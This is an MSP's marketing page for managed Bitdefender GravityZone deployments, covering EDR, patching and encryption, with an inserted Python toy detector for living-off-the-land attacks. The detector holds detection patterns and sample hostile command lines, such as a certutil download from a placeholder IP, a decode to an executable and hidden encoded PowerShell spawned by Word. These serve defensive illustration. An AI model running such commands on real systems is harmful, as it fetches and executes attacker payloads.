BITDEFENDER PARTNER

Bitdefender GravityZone
Done Properly
One Agent. Three OSes.

EDR, XDR, Patch Management, Full Disk Encryption and Email Security, deployed and tuned by an MSP that has lived in the GravityZone portal since 2018. Windows, macOS and Linux from a single console.

GravityZone since 2018 · 1 agent for all three OSes · ~150 third-party apps patched · R0 hidden remediation surprises
Partner credentials & platform coverage

Bitdefender: partner since 2015
Windows: EDR & XDR
macOS: same agent & console
Linux servers: full EDR telemetry
Patch management: ~150 third-party apps
Certified: GravityZone Business Sales; GravityZone Technical Solutions Professional (TSP)

Bitdefender partner since 2018 · Windows, macOS and Linux from one console · ZAR billing, local invoicing · Sandton-based, SA-only clients · Real engineer, no support ticket queue

Endpoint security as most SMEs have it, versus done properly.

What we typically find on a first audit, and what changes after a GravityZone deployment.

The typical SME on audit day

AV running. EDR: not a thing. Commodity malware is blocked fine. A human attacker living off the land (certutil, bitsadmin, PowerShell) goes completely unnoticed.
Macs and Linux servers are invisible. Defender-only shops have zero telemetry on anything that isn't Windows. Attackers know this. That's where they pivot.
Chrome hasn't been patched in 6 weeks. Third-party apps are patched "when someone gets around to it." The CVE was fixed by the vendor in February. It's April.
"We think most laptops are encrypted." No central enforcement, no auditable recovery keys. The insurer asks for encryption evidence. There is none.

vs

With GravityZone + OSH

Process trees. The full attack chain. One incident view. EDR shows PowerShell launched by Word reaching out to an IP in Belarus: actual context, not "anomaly detected, severity medium."
Windows, macOS and Linux: same console, same telemetry. One agent across all three OSes. Ubuntu servers, Apple Silicon Macs, Windows desktops, all visible, all policy-enforced.
~150 third-party apps patched automatically. Chrome, Zoom, Acrobat, Teams, 7-Zip, AnyDesk, scheduled and deployed. No one needs to remember.
FDE enforced, recovery keys auditable. BitLocker and FileVault managed centrally. Compliance evidence is a report export, not a spreadsheet someone made in 2022.
The honest picture

Most SMEs we audit have antivirus. Almost none have EDR. The gap is where breaches live.

AV catches the known-bad file. It does not catch the attacker who has already bypassed the AV and is now using Windows' own signed binaries: certutil.exe to decode a payload, bitsadmin.exe to download from a CDN, mshta.exe to execute a script from a remote server. None of these is malware. All of them are standard Windows tools. AV sees signed binaries doing things signed binaries do. EDR sees the sequence (which process launched which, with what command line, talking to where), and the sequence is the attack.
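The paragraph above (and the AV-versus-EDR answer in the FAQ further down) comes down to correlation: no single certutil.exe or powershell.exe launch is malicious on its own; the parent chain plus the arguments are. As an added illustration, not Bitdefender or GravityZone code, here is a toy version of that correlation in Python over constructed process-creation events. The event data, the argument patterns, and the hypothetical backupagent.exe exclusion are assumptions made for the example; a real EDR does this over live telemetry with far richer rules.

```python
"""Toy EDR-style process-chain correlation for the LOLBins the page names.

Added example, not Bitdefender/GravityZone code. Events below are constructed;
"backupagent.exe" and the exclusion list are hypothetical names used only to
show how tuning suppresses a known-good parent.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # file name only, as a process-creation sensor reports it
    cmdline: str


# Command-line fragments that turn an ordinary signed binary into a LOLBin use.
SUSPICIOUS = {
    "certutil.exe": [r"-decode", r"-urlcache", r"-encode"],
    "bitsadmin.exe": [r"/transfer", r"/addfile"],
    "mshta.exe": [r"https?://", r"javascript:", r"vbscript:"],
    "powershell.exe": [r"-enc", r"-w(indowstyle)?\s+hidden", r"downloadstring",
                       r"invoke-expression", r"frombase64string"],
}
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def suspicious_args(ev):
    """Return the SUSPICIOUS fragments present in this event's command line."""
    pats = SUSPICIOUS.get(ev.image.lower(), [])
    return [p for p in pats if re.search(p, ev.cmdline, re.IGNORECASE)]


def ancestry(index, pid):
    """Walk ppid links and return the chain root-first; stop at unseen parents."""
    chain, seen = [], set()
    while pid in index and pid not in seen:
        seen.add(pid)
        chain.append(index[pid])
        pid = index[pid].ppid
    return list(reversed(chain))


def detect(events, excluded_parents=frozenset()):
    """Correlate each LOLBin-style event with its parent chain and rate it.

    AV looks at each binary in isolation and sees nothing; this looks at the
    sequence. Any ancestor listed in excluded_parents suppresses the finding,
    which is the tuning step the rollout section describes.
    """
    index = {e.pid: e for e in events}
    findings = []
    for ev in sorted(events, key=lambda e: e.pid):
        hits = suspicious_args(ev)
        if not hits:
            continue
        chain = ancestry(index, ev.pid)
        parents = [c.image.lower() for c in chain[:-1]]
        if any(p in excluded_parents for p in parents):
            continue
        severity = "high" if any(p in OFFICE for p in parents) else "medium"
        findings.append({
            "pid": ev.pid,
            "chain": " > ".join(c.image for c in chain),
            "hits": hits,
            "severity": severity,
        })
    return findings


# Constructed sample telemetry: a macro document spawning the chain the page
# describes, an admin's benign certutil use, and a backup agent's script.
EVENTS = [
    ProcEvent(1000, 800, "explorer.exe", "explorer.exe"),
    ProcEvent(2000, 1000, "WINWORD.EXE", r'"C:\Office16\WINWORD.EXE" /n invoice.docm'),
    ProcEvent(2100, 2000, "powershell.exe", "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4A"),
    ProcEvent(2200, 2100, "certutil.exe", "certutil.exe -urlcache -split -f http://203.0.113.10/a.txt a.txt"),
    ProcEvent(2300, 2100, "certutil.exe", "certutil.exe -decode a.txt a.exe"),
    ProcEvent(3000, 1000, "cmd.exe", "cmd.exe"),
    ProcEvent(3100, 3000, "certutil.exe", "certutil.exe -store My"),
    ProcEvent(4000, 4, "services.exe", "services.exe"),
    ProcEvent(4100, 4000, "backupagent.exe", r"C:\Program Files\Backup\backupagent.exe"),
    ProcEvent(4200, 4100, "powershell.exe", "powershell.exe -NoProfile -EncodedCommand JABzAD0A"),
]

if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f["severity"].upper(), f["chain"], f["hits"])
    print("after excluding backupagent.exe:",
          [f["pid"] for f in detect(EVENTS, excluded_parents={"backupagent.exe"})])
```

Run it and the three processes under WINWORD.EXE come out as high severity with the full chain attached; the admin running certutil -store from a shell is never flagged, because nothing in its arguments is suspicious; the backup agent's encoded PowerShell is flagged medium until its parent is excluded, which is the ATC tuning step described under the hood.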

The dwell time problem makes this worse. The average time between initial compromise and detection in an SME environment is still measured in weeks. The attacker spends that time mapping the network, identifying the backup target, locating the finance shares, harvesting credentials. By the time a ransom note appears, lateral movement happened days ago. EDR doesn't always prevent the initial foothold, but it does dramatically compress the window between entry and detection.

The mixed-fleet version of this is worse. Defender-only shops have meaningful telemetry on Windows endpoints and none at all on macOS or Linux. Every attacker who has read a penetration testing report knows that Macs in a Windows-centric org are under-monitored. Linux servers running web apps on AWS with no EDR are a free pivot point once someone exploits the web app. "Linux doesn't get viruses" was approximately true in 2005. The attackers didn't get that memo.

A fully patched Windows fleet with Defender on Business Premium and someone who reads the alerts is genuinely decent endpoint security, for a 100% Windows org with no Linux and no Macs. The moment that stops being true, the gaps appear fast. We will tell you honestly whether you need to move.

The cyber-insurance angle is no longer theoretical. Renewal questionnaires for 2026 explicitly ask whether EDR with continuous monitoring is deployed. "We have antivirus" used to satisfy underwriters; it does not now. POPIA Section 19 requires appropriate, reasonable technical and organisational measures, and South African regulators are reading that with EDR-shaped expectations for anything that handles regulated data. For most businesses we work with, the compliance case for EDR is no longer optional.

GravityZone Modules We Deploy

EDR: Endpoint Detection & Response
Process trees, command-line activity, registry changes and network connections correlated into readable incidents. PowerShell launched by Word, reaching out to Belarus, not 'anomaly detected, severity medium.'
XDR: Extended Detection & Response
Widens EDR telemetry to include Microsoft 365, Google Workspace, network appliances and identity providers. One incident timeline: phish in the inbox, suspicious login, process on the laptop.
Patch Management
OS patches plus ~150 common third-party apps: Chrome, Edge, Firefox, Java, Acrobat, Zoom, Teams, 7-Zip, AnyDesk. The most common cause of compromise we see is an unpatched browser or document reader with a months-old public CVE, not a zero-day.
Full Disk Encryption
Management layer for native BitLocker (Windows) and FileVault (macOS). Recovery keys live in the GravityZone console, auditable and exportable. The encryption engine is OS-native, which is the correct answer.
Email Security
Cloud-based layer in front of Microsoft 365 or Google Workspace for URL/attachment scanning, sender reputation and sandbox detonation. Complements DMARC. It does not replace it.
Risk Management Dashboard
Scores every endpoint on misconfiguration (open RDP, weak password policy, SMBv1, autorun) and on user behaviour. Turns a GravityZone audit into something you can actually measure, not a 'you should be better' report.
Under the hood

Three things most GravityZone deployments get wrong

The licence is the easy part. Policy build, OS-specific tuning, and the mixed-fleet blind spots are where self-managed rollouts run into trouble.

01. Policy build: default settings will quarantine your backup software

GravityZone ships with sensible defaults that are not the right defaults for your environment. Default Advanced Threat Control settings flag backup agents, RMM tools, and legitimate admin scripts as suspicious, because they are behaviourally indistinguishable from malware. A rollout that goes straight to maximum sensitivity without a pilot phase will have your backup software quarantined and your IT team fielding calls within 48 hours.

The correct sequence: a pilot group of 10–20 endpoints across your actual OS mix; two weeks in report-only mode, where ATC logs what it would have blocked without blocking it; tune ATC exclusions for known-legitimate tooling; confirm Patch Management schedules don't fire during business hours; then roll to the full fleet. We write the exclusion list as part of the engagement, and each exclusion is scoped to the specific executable path or signer rather than a whole folder, because a broad exclusion is exactly where an attacker drops a payload. You get a policy that is actually tuned to your environment, not the same BEST (Bitdefender Endpoint Security Tools) template every MSP ships unchanged.

02. Mixed fleet: macOS and Linux need specific attention

The GravityZone macOS agent requires a set of approvals (system extension loading, Full Disk Access, the network filtering extension, and a device management profile) that are not granted automatically on user-provisioned Macs. MDM deployment, via Intune or Hexnode, is the correct path: the profiles pre-approve the extensions and privacy grants so the agent comes up protected on first boot. On an unmanaged Mac, the approval workflow requires the user to click through prompts at the device, which scales poorly past ten endpoints. We handle the MDM profile push as part of the rollout rather than leaving it as a user self-service step.

Linux is different again. The correct agent variant depends on the kernel version and distribution. Ubuntu 22.04 LTS needs a different kernel module build than Amazon Linux 2023. On RHEL-family systems, the SELinux policy interaction matters. We have run these combinations on actual client servers (Ubuntu, Debian, Rocky Linux, SUSE Enterprise, Amazon Linux) and know which edge cases to check before declaring an agent healthy. "Green in the console" is not the same as "kernel module loaded and on-access scanning active", so we verify on the host: confirm the on-access component is loaded, then write an EICAR test file into a monitored directory and confirm the agent detects and quarantines it within seconds. An agent that reports in but never raises that detection is a server with no protection.

03. AV removal: two security products on one endpoint is not a transition state

Two AV products on the same endpoint compete for file-system hooks, slow each other down, and produce conflicting quarantine actions. Some combinations cause boot loops. The transition window (old AV still present, GravityZone agent just installed) needs to be measured in hours, not days. We script removal of common products as part of every deployment: Sophos, ESET, Kaspersky, Trend Micro, Norton, McAfee, Avast, AVG. Windows Defender gets pushed to passive mode automatically by the GravityZone installer, but it is worth verifying that passive mode actually engaged rather than assuming: on the endpoint, Get-MpComputerStatus should report AMRunningMode as "Passive Mode", and if it still reads "Normal" both engines are active and the conflict above is live.

The other side of this is the Defender-integrated tooling that stops working when Defender goes passive. If your organisation uses Defender for Endpoint Plan 2 for its Conditional Access device-health integration, switching to GravityZone breaks that signal. We check for Defender dependencies before removal, not after. If your Intune Conditional Access policies depend on Defender health status, that conversation needs to happen at scoping, not at go-live.

How We Deploy GravityZone

01
Audit & Sizing

Free GravityZone health check or pre-sales scoping: endpoint count, OS mix, current AV, compliance drivers (POPIA, GDPR, cyber-insurance), and incident history. We size the licence tier honestly. You will not get upsold to XDR if EDR is what you need.

02
Pilot & Policy Build

Test group of 10–20 endpoints across your actual OS mix. We build BEST policies from a known-good baseline and tune Advanced Threat Control before any wide rollout. We want to surface false positives on the pilot, not after.

03
Phased Rollout

Group-by-group deployment with old-AV removal scripts where needed. We have written removal flows for Sophos, ESET, Kaspersky, Trend Micro, Norton, McAfee, Avast and AVG over the years. Patch Management and FDE switch on once endpoints are stable.

04
Managed Operations

Weekly Risk Management dashboard review, monthly patch reporting, EDR incident triage as alerts arrive. Quarterly policy refresh as Bitdefender ships new detection content and the picture changes.

GravityZone vs Defender for Business vs DIY

The honest comparison, for when you're deciding whether to move.

Columns: GravityZone EDR (OSH managed) · Defender for Business (M365 Business Premium) · GravityZone (self-managed)

Windows endpoint protection
macOS EDR coverage (Defender for Business: limited)
Linux server EDR
Third-party app patching (~150 apps)
Central FDE key management (Defender for Business: via Intune)
Policy tuned to your environment (self-managed GravityZone: defaults only)
ZAR billing · SA-based support

Defender for Business ships with M365 Business Premium. GravityZone is licensed separately through OSH; we quote against your existing AV renewal.

Get a Free GravityZone Health Check

If you already run Bitdefender, we will audit your policies, patch posture, EDR coverage and Risk Management score, and send you a written report. If you don't, we will scope a pilot against your current AV. No obligation. Real engineer. Real findings.

GravityZone Questions We Get Every Week

Is Defender for Business good enough, or do we need GravityZone?

For a 100% Windows fleet on Microsoft 365 Business Premium with the licence already paid, Defender for Business is fine and we will say so. The moment you have a Mac, a Linux server, or want patch management and full disk encryption in the same console, Defender starts to fall over. GravityZone covers all three OSes from one console, ships with stronger ransomware rollback, and the EDR tier includes managed-detection workflows Defender for Business does not have. The honest counter-point: Defender's integration with Conditional Access and Microsoft Sentinel is tighter than anything a third party can offer on Microsoft's own stack. If you are heading toward a full Sentinel SOC, that matters.

What does GravityZone cost?

Pricing is per endpoint per year and depends on the tier (Business Security, Business Security Premium, EDR, XDR) and term length. Bitdefender publishes a list price; OSH passes through partner pricing and invoices in ZAR. We are happy to quote against your current AV renewal. You usually save money and get more modules.

What is the difference between AV and EDR, and do we actually need EDR?

Standard AV catches commodity malware. EDR catches the human attacker who has already bypassed the AV: the one running PowerShell, dumping credentials, and moving laterally using legitimate Windows binaries such as certutil.exe, bitsadmin.exe and mshta.exe, where the tell is the chain of processes and their command lines rather than any one file. If you are subject to POPIA, GDPR, SOC 2, or any cyber-insurance policy renewing in 2026, EDR is no longer optional. Underwriters now ask about it explicitly.

Does GravityZone cover Linux properly?

Yes, and properly. The Linux agent is a real on-access scanner with kernel-module support for Ubuntu 20.04/22.04/24.04 LTS, Debian 11/12, RHEL/Rocky/Alma 8/9, SUSE Enterprise, and Amazon Linux 2/2023. You get the same EDR telemetry as the Windows agent. If you are running web-facing Linux with no EDR on it, that is the highest-risk gap in your environment and we will tell you so.

Will the agent slow our machines down?

On a current machine, no. The single-agent architecture is lighter than running Defender plus a third-party patcher plus a separate encryption tool. On older hardware (pre-8th-gen Intel) we tune scan exclusions and process-monitoring scope as part of the rollout. That is standard practice, not a workaround.

We already have BitLocker and FileVault. Do we need the FDE module?

You probably don't need it for the encryption itself. BitLocker and FileVault are already the right tools. GravityZone FDE is a management layer: it enforces encryption policy centrally, stores and audits recovery keys in the console, and gives you instant proof for auditors or insurers that every device in the fleet is encrypted. If Intune already manages BitLocker recovery keys for you, the GravityZone FDE add-on is redundant. We will tell you that in the scoping call.

Does Email Security replace DMARC?

No. Bitdefender Email Security is a strong content/URL/attachment layer in front of Microsoft 365 and Google Workspace. It is not a replacement for properly configured SPF, DKIM and DMARC, which are still mandatory for deliverability and anti-spoofing. GravityZone Email Security inspects inbound content; DMARC authenticates who is allowed to send as your domain. You want both, and they solve different problems.

Can you remove our existing AV?

Yes. We script the removal of common products (Sophos, ESET, Kaspersky, Trend Micro, Norton, McAfee, Avast, AVG) as part of the GravityZone deployment package. Defender on Windows gets pushed to passive mode automatically by the GravityZone installer, and we verify that passive mode actually engaged on each endpoint rather than assuming it. No reboot loops, no double-AV conflicts.

Which tier should we buy?

Most clients we work with land on Business Security Premium (the rebadged Advanced Business Security) or GravityZone EDR. Business Security Premium suits a mixed-fleet SME with no in-house SOC that wants patch management, encryption and better detection than base AV without the EDR overhead. GravityZone EDR is for anyone with compliance drivers, a cyber-insurance renewal questionnaire, or regulated data. XDR is for businesses with a security analyst on staff or an MDR partner who will actually consume the cross-layer telemetry. We will tell you honestly which way to lean in the audit. If you are still weighing the two top tiers, we will walk you through the decision.


Email us directly support@osh.co.za
